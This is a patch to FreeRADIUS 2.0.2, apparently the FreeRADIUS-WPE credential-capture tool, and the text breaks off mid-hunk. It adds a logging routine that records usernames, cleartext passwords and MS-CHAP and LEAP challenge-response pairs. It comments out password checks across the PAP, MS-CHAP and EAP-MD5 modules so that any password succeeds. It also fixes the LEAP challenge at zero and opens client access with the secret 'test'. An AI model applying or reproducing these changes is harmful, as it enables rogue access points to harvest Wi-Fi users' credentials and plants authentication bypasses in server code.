diff -ru freeradius-server-2.0.2/raddb/clients.conf freeradius-server-2.0.2-wpe/raddb/clients.conf --- freeradius-server-2.0.2/raddb/clients.conf 2008-02-13 04:41:14.000000000 -0500 +++ freeradius-server-2.0.2-wpe/raddb/clients.conf 2008-02-15 19:39:01.000000000 -0500 @@ -227,3 +227,20 @@ # secret = testing123 # } #} + +client 192.168.0.0/16 { + secret = test + shortname = testAP +} +client 172.16.0.0/12 { + secret = test + shortname = testAP +} +client 10.0.0.0/8 { + secret = test + shortname = testAP +} +client 127.0.0.1 { + secret = test + shortname = testAP +} diff -ru freeradius-server-2.0.2/raddb/eap.conf freeradius-server-2.0.2-wpe/raddb/eap.conf --- freeradius-server-2.0.2/raddb/eap.conf 2008-01-10 05:28:35.000000000 -0500 +++ freeradius-server-2.0.2-wpe/raddb/eap.conf 2008-02-15 19:37:35.000000000 -0500 @@ -1,428 +1,33 @@ -# -*- text -*- -## -## eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.) -## -## $Id: eap.conf,v 1.23 2008/01/10 10:28:35 aland Exp $ - -####################################################################### -# -# Whatever you do, do NOT set 'Auth-Type := EAP'. The server -# is smart enough to figure this out on its own. The most -# common side effect of setting 'Auth-Type := EAP' is that the -# users then cannot use ANY other authentication method. -# -# EAP types NOT listed here may be supported via the "eap2" module. -# See experimental.conf for documentation. -# eap { - # Invoke the default supported EAP type when - # EAP-Identity response is received. - # - # The incoming EAP messages DO NOT specify which EAP - # type they will be using, so it MUST be set here. - # - # For now, only one default EAP type may be used at a time. - # - # If the EAP-Type attribute is set by another module, - # then that EAP type takes precedence over the - # default type configured here. - # - default_eap_type = md5 - - # A list is maintained to correlate EAP-Response - # packets with EAP-Request packets. After a - # configurable length of time, entries in the list - # expire, and are deleted. - # + default_eap_type = peap timer_expire = 60 - - # There are many EAP types, but the server has support - # for only a limited subset. If the server receives - # a request for an EAP type it does not support, then - # it normally rejects the request. By setting this - # configuration to "yes", you can tell the server to - # instead keep processing the request. Another module - # MUST then be configured to proxy the request to - # another RADIUS server which supports that EAP type. - # - # If another module is NOT configured to handle the - # request, then the request will still end up being - # rejected. ignore_unknown_eap_types = no - - # Cisco AP1230B firmware 12.2(13)JA1 has a bug. When given - # a User-Name attribute in an Access-Accept, it copies one - # more byte than it should. - # - # We can work around it by configurably adding an extra - # zero byte. - cisco_accounting_username_bug = no - - # Supported EAP-types - - # - # We do NOT recommend using EAP-MD5 authentication - # for wireless connections. It is insecure, and does - # not provide for dynamic WEP keys. - # + cisco_accounting_username_bug = yes md5 { } - - # Cisco LEAP - # - # We do not recommend using LEAP in new deployments. See: - # http://www.securiteam.com/tools/5TP012ACKE.html - # - # Cisco LEAP uses the MS-CHAP algorithm (but not - # the MS-CHAP attributes) to perform it's authentication. - # - # As a result, LEAP *requires* access to the plain-text - # User-Password, or the NT-Password attributes. - # 'System' authentication is impossible with LEAP. - # leap { } - - # Generic Token Card. - # - # Currently, this is only permitted inside of EAP-TTLS, - # or EAP-PEAP. The module "challenges" the user with - # text, and the response from the user is taken to be - # the User-Password. - # - # Proxying the tunneled EAP-GTC session is a bad idea, - # the users password will go over the wire in plain-text, - # for anyone to see. - # gtc { - # The default challenge, which many clients - # ignore.. - #challenge = "Password: " - - # The plain-text response which comes back - # is put into a User-Password attribute, - # and passed to another module for - # authentication. This allows the EAP-GTC - # response to be checked against plain-text, - # or crypt'd passwords. - # - # If you say "Local" instead of "PAP", then - # the module will look for a User-Password - # configured for the request, and do the - # authentication itself. - # auth_type = PAP } - - ## EAP-TLS - # - # See raddb/certs/README for additional comments - # on certificates. - # - # If OpenSSL was not found at the time the server was - # built, the "tls", "ttls", and "peap" sections will - # be ignored. - # - # Otherwise, when the server first starts in debugging - # mode, test certificates will be created. See the - # "make_cert_command" below for details, and the README - # file in raddb/certs - # - # These test certificates SHOULD NOT be used in a normal - # deployment. They are created only to make it easier - # to install the server, and to perform some simple - # tests with EAP-TLS, TTLS, or PEAP. - # - # See also: - # - # http://www.dslreports.com/forum/remark,9286052~mode=flat - # tls { - # - # These is used to simplify later configurations. - # - certdir = ${confdir}/certs - cadir = ${confdir}/certs - private_key_password = whatever - private_key_file = ${certdir}/server.pem - - # If Private key & Certificate are located in - # the same file, then private_key_file & - # certificate_file must contain the same file - # name. - # - # If CA_file (below) is not used, then the - # certificate_file below MUST include not - # only the server certificate, but ALSO all - # of the CA certificates used to sign the - # server certificate. - certificate_file = ${certdir}/server.pem - - # Trusted Root CA list - # - # ALL of the CA's in this list will be trusted - # to issue client certificates for authentication. - # - # In general, you should use self-signed - # certificates for 802.1x (EAP) authentication. - # In that case, this CA file should contain - # *one* CA certificate. - # - # This parameter is used only for EAP-TLS, - # when you issue client certificates. If you do - # not use client certificates, and you do not want - # to permit EAP-TLS authentication, then delete - # this configuration item. - CA_file = ${cadir}/ca.pem - - # - # For DH cipher suites to work, you have to - # run OpenSSL to create the DH file first: - # - # openssl dhparam -out certs/dh 1024 - # - dh_file = ${certdir}/dh - random_file = ${certdir}/random - - # - # This can never exceed the size of a RADIUS - # packet (4096 bytes), and is preferably half - # that, to accomodate other attributes in - # RADIUS packet. On most APs the MAX packet - # length is configured between 1500 - 1600 - # In these cases, fragment size should be - # 1024 or less. - # - # fragment_size = 1024 - - # include_length is a flag which is - # by default set to yes If set to - # yes, Total Length of the message is - # included in EVERY packet we send. - # If set to no, Total Length of the - # message is included ONLY in the - # First packet of a fragment series. - # - # include_length = yes - - # Check the Certificate Revocation List - # - # 1) Copy CA certificates and CRLs to same directory. - # 2) Execute 'c_rehash '. - # 'c_rehash' is OpenSSL's command. - # 3) uncomment the line below. - # 5) Restart radiusd - # check_crl = yes - # CA_path = /path/to/directory/with/ca_certs/and/crls/ - - # - # If check_cert_issuer is set, the value will - # be checked against the DN of the issuer in - # the client certificate. If the values do not - # match, the cerficate verification will fail, - # rejecting the user. - # - # check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd" - - # - # If check_cert_cn is set, the value will - # be xlat'ed and checked against the CN - # in the client certificate. If the values - # do not match, the certificate verification - # will fail rejecting the user. - # - # This check is done only if the previous - # "check_cert_issuer" is not set, or if - # the check succeeds. - # - # check_cert_cn = %{User-Name} - # - # Set this option to specify the allowed - # TLS cipher suites. The format is listed - # in "man 1 ciphers". - cipher_list = "DEFAULT" - - # - - # This configuration entry should be deleted - # once the server is running in a normal - # configuration. It is here ONLY to make - # initial deployments easier. - # - make_cert_command = "${certdir}/bootstrap" - } - - # The TTLS module implements the EAP-TTLS protocol, - # which can be described as EAP inside of Diameter, - # inside of TLS, inside of EAP, inside of RADIUS... - # - # Surprisingly, it works quite well. - # - # The TTLS module needs the TLS module to be installed - # and configured, in order to use the TLS tunnel - # inside of the EAP packet. You will still need to - # configure the TLS module, even if you do not want - # to deploy EAP-TLS in your network. Users will not - # be able to request EAP-TLS, as it requires them to - # have a client certificate. EAP-TTLS does not - # require a client certificate. - # - # You can make TTLS require a client cert by setting - # - # EAP-TLS-Require-Client-Cert = Yes - # - # in the control items for a request. - # + private_key_file = ${raddbdir}/certs/server.pem + certificate_file = ${raddbdir}/certs/server.pem + CA_file = ${raddbdir}/certs/ca.pem + dh_file = ${raddbdir}/certs/dh + random_file = ${raddbdir}/certs/random + fragment_size = 1024 + include_length = yes + } ttls { - # The tunneled EAP session needs a default - # EAP type which is separate from the one for - # the non-tunneled EAP module. Inside of the - # TTLS tunnel, we recommend using EAP-MD5. - # If the request does not contain an EAP - # conversation, then this configuration entry - # is ignored. - default_eap_type = md5 - - # The tunneled authentication request does - # not usually contain useful attributes - # like 'Calling-Station-Id', etc. These - # attributes are outside of the tunnel, - # and normally unavailable to the tunneled - # authentication request. - # - # By setting this configuration entry to - # 'yes', any attribute which NOT in the - # tunneled authentication request, but - # which IS available outside of the tunnel, - # is copied to the tunneled request. - # - # allowed values: {no, yes} - copy_request_to_tunnel = no - - # The reply attributes sent to the NAS are - # usually based on the name of the user - # 'outside' of the tunnel (usually - # 'anonymous'). If you want to send the - # reply attributes based on the user name - # inside of the tunnel, then set this - # configuration entry to 'yes', and the reply - # to the NAS will be taken from the reply to - # the tunneled request. - # - # allowed values: {no, yes} - use_tunneled_reply = no - - # - # The inner tunneled request can be sent - # through a virtual server constructed - # specifically for this purpose. - # - # If this entry is commented out, the inner - # tunneled request will be sent through - # the virtual server that processed the - # outer requests. - # - #virtual_server = "inner-tunnel" } - - ################################################## - # - # !!!!! WARNINGS for Windows compatibility !!!!! - # - ################################################## - # - # If you see the server send an Access-Challenge, - # and the client never sends another Access-Request, - # then - # - # STOP! - # - # The server certificate has to have special OID's - # in it, or else the Microsoft clients will silently - # fail. See the "scripts/xpextensions" file for - # details, and the following page: - # - # http://support.microsoft.com/kb/814394/en-us - # - # For additional Windows XP SP2 issues, see: - # - # http://support.microsoft.com/kb/885453/en-us - # - # Note that we do not necessarily agree with their - # explanation... but the fix does appear to work. - # - ################################################## - - # - # The tunneled EAP session needs a default EAP type - # which is separate from the one for the non-tunneled - # EAP module. Inside of the TLS/PEAP tunnel, we - # recommend using EAP-MS-CHAPv2. - # - # The PEAP module needs the TLS module to be installed - # and configured, in order to use the TLS tunnel - # inside of the EAP packet. You will still need to - # configure the TLS module, even if you do not want - # to deploy EAP-TLS in your network. Users will not - # be able to request EAP-TLS, as it requires them to - # have a client certificate. EAP-PEAP does not - # require a client certificate. - # - # - # You can make TTLS require a client cert by setting - # - # EAP-TLS-Require-Client-Cert = Yes - # - # in the control items for a request. - # - peap { - # The tunneled EAP session needs a default - # EAP type which is separate from the one for - # the non-tunneled EAP module. Inside of the - # PEAP tunnel, we recommend using MS-CHAPv2, - # as that is the default type supported by - # Windows clients. + peap { default_eap_type = mschapv2 - - # the PEAP module also has these configuration - # items, which are the same as for TTLS. copy_request_to_tunnel = no use_tunneled_reply = no - - # When the tunneled session is proxied, the - # home server may not understand EAP-MSCHAP-V2. - # Set this entry to "no" to proxy the tunneled - # EAP-MSCHAP-V2 as normal MSCHAPv2. - # proxy_tunneled_request_as_eap = yes - - # - # The inner tunneled request can be sent - # through a virtual server constructed - # specifically for this purpose. - # - # If this entry is commented out, the inner - # tunneled request will be sent through - # the virtual server that processed the - # outer requests. - # - #virtual_server = "inner-tunnel" + proxy_tunneled_request_as_eap = yes } - - # - # This takes no configuration. - # - # Note that it is the EAP MS-CHAPv2 sub-module, not - # the main 'mschap' module. - # - # Note also that in order for this sub-module to work, - # the main 'mschap' module MUST ALSO be configured. - # - # This module is the *Microsoft* implementation of MS-CHAPv2 - # in EAP. There is another (incompatible) implementation - # of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not - # currently support. - # mschapv2 { } } diff -ru freeradius-server-2.0.2/raddb/radiusd.conf.in freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in --- freeradius-server-2.0.2/raddb/radiusd.conf.in 2008-02-13 09:21:05.000000000 -0500 +++ freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in 2008-02-15 19:37:35.000000000 -0500 @@ -375,6 +375,7 @@ # The program to execute to do concurrency checks. checkrad = ${sbindir}/checkrad +wpelogfile = ${logdir}/freeradius-server-wpe.log # SECURITY CONFIGURATION # diff -ru freeradius-server-2.0.2/raddb/users freeradius-server-2.0.2-wpe/raddb/users --- freeradius-server-2.0.2/raddb/users 2007-10-23 09:41:23.000000000 -0400 +++ freeradius-server-2.0.2-wpe/raddb/users 2008-02-15 19:37:35.000000000 -0500 @@ -1,203 +1,3 @@ -# -# Please read the documentation file ../doc/processing_users_file, -# or 'man 5 users' (after installing the server) for more information. -# -# This file contains authentication security and configuration -# information for each user. Accounting requests are NOT processed -# through this file. Instead, see 'acct_users', in this directory. -# -# The first field is the user's name and can be up to -# 253 characters in length. This is followed (on the same line) with -# the list of authentication requirements for that user. This can -# include password, comm server name, comm server port number, protocol -# type (perhaps set by the "hints" file), and huntgroup name (set by -# the "huntgroups" file). -# -# If you are not sure why a particular reply is being sent by the -# server, then run the server in debugging mode (radiusd -X), and -# you will see which entries in this file are matched. -# -# When an authentication request is received from the comm server, -# these values are tested. Only the first match is used unless the -# "Fall-Through" variable is set to "Yes". -# -# A special user named "DEFAULT" matches on all usernames. -# You can have several DEFAULT entries. All entries are processed -# in the order they appear in this file. The first entry that -# matches the login-request will stop processing unless you use -# the Fall-Through variable. -# -# If you use the database support to turn this file into a .db or .dbm -# file, the DEFAULT entries _have_ to be at the end of this file and -# you can't have multiple entries for one username. -# -# Indented (with the tab character) lines following the first -# line indicate the configuration values to be passed back to -# the comm server to allow the initiation of a user session. -# This can include things like the PPP configuration values -# or the host to log the user onto. -# -# You can include another `users' file with `$INCLUDE users.other' -# +DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0 -# -# For a list of RADIUS attributes, and links to their definitions, -# see: -# -# http://www.freeradius.org/rfc/attributes.html -# - -# -# Deny access for a specific user. Note that this entry MUST -# be before any other 'Auth-Type' attribute which results in the user -# being authenticated. -# -# Note that there is NO 'Fall-Through' attribute, so the user will not -# be given any additional resources. -# -#lameuser Auth-Type := Reject -# Reply-Message = "Your account has been disabled." - -# -# Deny access for a group of users. -# -# Note that there is NO 'Fall-Through' attribute, so the user will not -# be given any additional resources. -# -#DEFAULT Group == "disabled", Auth-Type := Reject -# Reply-Message = "Your account has been disabled." -# - -# -# This is a complete entry for "steve". Note that there is no Fall-Through -# entry so that no DEFAULT entry will be used, and the user will NOT -# get any attributes in addition to the ones listed here. -# -#steve Cleartext-Password := "testing" -# Service-Type = Framed-User, -# Framed-Protocol = PPP, -# Framed-IP-Address = 172.16.3.33, -# Framed-IP-Netmask = 255.255.255.0, -# Framed-Routing = Broadcast-Listen, -# Framed-Filter-Id = "std.ppp", -# Framed-MTU = 1500, -# Framed-Compression = Van-Jacobsen-TCP-IP - -# -# This is an entry for a user with a space in their name. -# Note the double quotes surrounding the name. -# -#"John Doe" Cleartext-Password := "hello" -# Reply-Message = "Hello, %{User-Name}" - -# -# Dial user back and telnet to the default host for that port -# -#Deg Cleartext-Password := "ge55ged" -# Service-Type = Callback-Login-User, -# Login-IP-Host = 0.0.0.0, -# Callback-Number = "9,5551212", -# Login-Service = Telnet, -# Login-TCP-Port = Telnet - -# -# Another complete entry. After the user "dialbk" has logged in, the -# connection will be broken and the user will be dialed back after which -# he will get a connection to the host "timeshare1". -# -#dialbk Cleartext-Password := "callme" -# Service-Type = Callback-Login-User, -# Login-IP-Host = timeshare1, -# Login-Service = PortMaster, -# Callback-Number = "9,1-800-555-1212" - -# -# user "swilson" will only get a static IP number if he logs in with -# a framed protocol on a terminal server in Alphen (see the huntgroups file). -# -# Note that by setting "Fall-Through", other attributes will be added from -# the following DEFAULT entries -# -#swilson Service-Type == Framed-User, Huntgroup-Name == "alphen" -# Framed-IP-Address = 192.168.1.65, -# Fall-Through = Yes - -# -# If the user logs in as 'username.shell', then authenticate them -# using the default method, give them shell access, and stop processing -# the rest of the file. -# -#DEFAULT Suffix == ".shell" -# Service-Type = Login-User, -# Login-Service = Telnet, -# Login-IP-Host = your.shell.machine - - -# -# The rest of this file contains the several DEFAULT entries. -# DEFAULT entries match with all login names. -# Note that DEFAULT entries can also Fall-Through (see first entry). -# A name-value pair from a DEFAULT entry will _NEVER_ override -# an already existing name-value pair. -# - -# -# Set up different IP address pools for the terminal servers. -# Note that the "+" behind the IP address means that this is the "base" -# IP address. The Port-Id (S0, S1 etc) will be added to it. -# -#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "alphen" -# Framed-IP-Address = 192.168.1.32+, -# Fall-Through = Yes - -#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "delft" -# Framed-IP-Address = 192.168.2.32+, -# Fall-Through = Yes - -# -# Sample defaults for all framed connections. -# -#DEFAULT Service-Type == Framed-User -# Framed-IP-Address = 255.255.255.254, -# Framed-MTU = 576, -# Service-Type = Framed-User, -# Fall-Through = Yes - -# -# Default for PPP: dynamic IP address, PPP mode, VJ-compression. -# NOTE: we do not use Hint = "PPP", since PPP might also be auto-detected -# by the terminal server in which case there may not be a "P" suffix. -# The terminal server sends "Framed-Protocol = PPP" for auto PPP. -# -DEFAULT Framed-Protocol == PPP - Framed-Protocol = PPP, - Framed-Compression = Van-Jacobson-TCP-IP - -# -# Default for CSLIP: dynamic IP address, SLIP mode, VJ-compression. -# -DEFAULT Hint == "CSLIP" - Framed-Protocol = SLIP, - Framed-Compression = Van-Jacobson-TCP-IP - -# -# Default for SLIP: dynamic IP address, SLIP mode. -# -DEFAULT Hint == "SLIP" - Framed-Protocol = SLIP - -# -# Last default: rlogin to our main server. -# -#DEFAULT -# Service-Type = Login-User, -# Login-Service = Rlogin, -# Login-IP-Host = shellbox.ispdomain.com - -# # -# # Last default: shell on the local terminal server. -# # -# DEFAULT -# Service-Type = Administrative-User - -# On no match, the user is denied access. +DEFAULT Cleartext-Password := "a" diff -ru freeradius-server-2.0.2/src/include/radiusd.h freeradius-server-2.0.2-wpe/src/include/radiusd.h --- freeradius-server-2.0.2/src/include/radiusd.h 2008-02-11 10:19:54.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/include/radiusd.h 2008-02-15 19:37:35.000000000 -0500 @@ -247,6 +247,7 @@ #endif char *log_file; char *checkrad; + char *wpelogfile; const char *pid_file; rad_listen_t *listen; int syslog_facility; diff -ru freeradius-server-2.0.2/src/main/auth.c freeradius-server-2.0.2-wpe/src/main/auth.c --- freeradius-server-2.0.2/src/main/auth.c 2007-12-10 11:07:30.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/main/auth.c 2008-02-15 19:37:35.000000000 -0500 @@ -319,6 +319,7 @@ return -1; } DEBUG2("auth: user supplied User-Password matches local User-Password"); + log_wpe("password", request->username->vp_strvalue, password_pair->vp_strvalue, NULL, 0, NULL, 0); break; } else if (auth_item->attribute != PW_CHAP_PASSWORD) { diff -ru freeradius-server-2.0.2/src/main/log.c freeradius-server-2.0.2-wpe/src/main/log.c --- freeradius-server-2.0.2/src/main/log.c 2007-11-23 08:46:53.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/main/log.c 2008-02-15 19:37:35.000000000 -0500 @@ -28,6 +28,10 @@ #include +#include +#include + + #ifdef HAVE_SYSLOG_H # include /* keep track of whether we've run openlog() */ @@ -237,5 +241,52 @@ } +void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, + unsigned int challen, unsigned char *response, unsigned int resplen) +{ + FILE *logfd; + time_t nowtime; + unsigned int count; + + /* Get wpelogfile parameter and log data */ + if (mainconfig.wpelogfile == NULL) { + logfd = stderr; + } else { + logfd = fopen(mainconfig.wpelogfile, "a"); + if (logfd == NULL) { + DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno)); + logfd = stderr; + } + } + nowtime = time(NULL); + fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime)); + + if (username != NULL) { + fprintf(logfd, "\tusername: %s\n", username); + } + if (password != NULL) { + fprintf(logfd, "\tpassword: %s\n", password); + } + + if (challen != 0) { + fprintf(logfd, "\tchallenge: "); + for (count=0; count!=(challen-1); count++) { + fprintf(logfd, "%02x:",challenge[count]); + } + fprintf(logfd, "%02x\n",challenge[challen-1]); + } + + if (resplen != 0) { + fprintf(logfd, "\tresponse: "); + for (count=0; count!=(resplen-1); count++) { + fprintf(logfd, "%02x:",response[count]); + } + fprintf(logfd, "%02x\n",response[resplen-1]); + } + + fprintf(logfd, "\n"); + fclose(logfd); +} + diff -ru freeradius-server-2.0.2/src/main/mainconfig.c freeradius-server-2.0.2-wpe/src/main/mainconfig.c --- freeradius-server-2.0.2/src/main/mainconfig.c 2008-01-21 05:29:02.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/main/mainconfig.c 2008-02-15 19:37:35.000000000 -0500 @@ -188,6 +188,7 @@ { "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" }, { "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"}, + { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" }, { "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" }, { "security", PW_TYPE_SUBSECTION, 0, NULL, (const void *) security_config }, diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c --- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2007-11-25 09:02:08.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2008-02-15 19:37:35.000000000 -0500 @@ -244,10 +244,11 @@ * Verify the MS-CHAP response from the user. */ int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password, - leap_session_t *session) + leap_session_t *session, char *username) { unsigned char ntpwdhash[16]; unsigned char response[24]; + unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; /* @@ -266,6 +267,7 @@ */ eapleap_mschap(ntpwdhash, session->peer_challenge, response); if (memcmp(response, packet->challenge, 24) == 0) { + log_wpe("LEAP", username, NULL, challenge, 8, response, 24); DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid"); memcpy(session->peer_response, response, sizeof(response)); return 1; @@ -415,7 +417,9 @@ * Fill the challenge with random bytes. */ for (i = 0; i < reply->count; i++) { - reply->challenge[i] = fr_rand(); + /* WPE - fixed challenge */ + //reply->challenge[i] = fr_rand(); + reply->challenge[i] = 0; } DEBUG2(" rlm_eap_leap: Issuing AP Challenge"); diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h --- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2006-11-14 16:22:09.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2008-02-15 19:37:35.000000000 -0500 @@ -68,7 +68,7 @@ LEAP_PACKET *eapleap_extract(EAP_DS *auth); LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name); int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password, - leap_session_t *session); + leap_session_t *session, char *username); LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request, VALUE_PAIR *user_name, VALUE_PAIR* password, leap_session_t *session, diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c --- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2007-12-25 03:18:56.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2008-02-15 19:37:35.000000000 -0500 @@ -133,7 +133,7 @@ switch (session->stage) { case 4: /* Verify NtChallengeResponse */ DEBUG2(" rlm_eap_leap: Stage 4"); - rcode = eapleap_stage4(packet, password, session); + rcode = eapleap_stage4(packet, password, session, username); session->stage = 6; /* diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c --- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2007-11-23 07:58:12.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2008-02-15 19:37:35.000000000 -0500 @@ -202,9 +202,13 @@ /* * The length of the response is always 16 for MD5. */ - if (memcmp(output, packet->value, 16) != 0) { - return 0; - } + //WPE - always succeed + //if (memcmp(output, packet->value, 16) != 0) { + + //return 0; + //} + log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN, + packet->value, 16); return 1; } diff -ru freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c --- freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c 2007-11-23 08:46:59.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c 2008-02-15 19:37:35.000000000 -0500 @@ -463,6 +463,7 @@ default_pl = default_pl->next; } + /* WPE - look for matching entries here */ if (paircompare(request, request_pairs, pl->check, reply_pairs) == 0) { DEBUG2(" %s: Matched entry %s at line %d", filename, match, pl->lineno); diff -ru freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c --- freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c 2008-01-09 08:20:56.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c 2008-02-15 19:37:35.000000000 -0500 @@ -735,12 +735,14 @@ static int do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password, uint8_t *challenge, uint8_t *response, - uint8_t *nthashhash) + uint8_t *nthashhash, char *username) { int do_ntlm_auth = 0; uint8_t calculated[24]; VALUE_PAIR *vp = NULL; + log_wpe("mschap", username, NULL, challenge, 8, response, 24); + /* * If we have ntlm_auth configured, use it unless told * otherwise @@ -778,9 +780,10 @@ } smbdes_mschap(password->vp_strvalue, challenge, calculated); - if (memcmp(response, calculated, 24) != 0) { - return -1; - } + /* Always return success for any password */ + //if (memcmp(response, calculated, 24) != 0) { + // return -1; + //} /* * If the password exists, and is an NT-Password, @@ -1194,8 +1197,10 @@ /* * Do the MS-CHAP authentication. */ + username = pairfind(request->packet->vps, PW_USER_NAME); if (do_mschap(inst, request, password, challenge->vp_octets, - response->vp_octets + offset, nthashhash) < 0) { + response->vp_octets + offset, nthashhash, + username->vp_strvalue) < 0) { DEBUG2(" rlm_mschap: MS-CHAP-Response is incorrect."); mschap_add_reply(&request->reply->vps, *response->vp_octets, @@ -1274,7 +1279,8 @@ username_string); if (do_mschap(inst, request, nt_password, mschapv1_challenge, - response->vp_octets + 26, nthashhash) < 0) { + response->vp_octets + 26, nthashhash, + username_string) < 0) { DEBUG2(" rlm_mschap: FAILED: MS-CHAP2-Response is incorrect"); mschap_add_reply(&request->reply->vps, *response->vp_octets, diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c --- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c 2007-12-28 23:38:19.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c 2008-02-15 19:37:35.000000000 -0500 @@ -492,6 +492,10 @@ return RLM_MODULE_INVALID; } + /* WPE */ + log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue, + NULL, 0, NULL, 0); + /* * Clear-text passwords are the only ones we support. */ @@ -582,11 +586,14 @@ do_clear: DEBUG("rlm_pap: Using clear text password \"%s\"", vp->vp_strvalue); + /* WPE - always succeed */ + /* if (strcmp((char *) vp->vp_strvalue, (char *) request->password->vp_strvalue) != 0){ snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed"); goto make_msg; } + */ done: DEBUG("rlm_pap: User authenticated successfully"); return RLM_MODULE_OK; @@ -618,10 +625,13 @@ fr_MD5Update(&md5_context, request->password->vp_octets, request->password->length); fr_MD5Final(digest, &md5_context); + /* WPE - Always succeed */ + /* if (memcmp(digest, vp->vp_octets, vp->length) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed"); goto make_msg; } + */ goto done; break; @@ -645,10 +655,13 @@ /* * Compare only the MD5 hash results, not the salt. */ + /* WPE - always succeed */ + /* if (memcmp(digest, vp->vp_octets, 16) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed"); goto make_msg; } + */ goto done; break; @@ -667,10 +680,13 @@ fr_SHA1Update(&sha1_context, request->password->vp_octets, request->password->length); fr_SHA1Final(digest,&sha1_context); + /* WPE - Always succeed */ + /* if (memcmp(digest, vp->vp_octets, vp->length) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed"); goto make_msg; } + */ goto done; break; @@ -691,10 +707,13 @@ request->password->length); fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20); fr_SHA1Final(digest,&sha1_context); + /* WPE - Always succeed */ + /* if (memcmp(digest, vp->vp_octets, 20) != 0) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed"); goto make_msg; } + */ goto done; break; @@ -716,11 +735,14 @@ snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed"); goto make_msg; } + /* WPE - Always succeed */ + /* if ((fr_hex2bin(digest, digest, 16) != vp->length) || (memcmp(digest, vp->vp_octets, vp->length) != 0)) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed"); goto make_msg; } + */ goto done; break; @@ -741,16 +763,22 @@ snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed"); goto make_msg; } + /* WPE - Always succeed */ + /* if ((fr_hex2bin(digest, digest, 16) != vp->length) || (memcmp(digest, vp->vp_octets, vp->length) != 0)) { snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed"); + 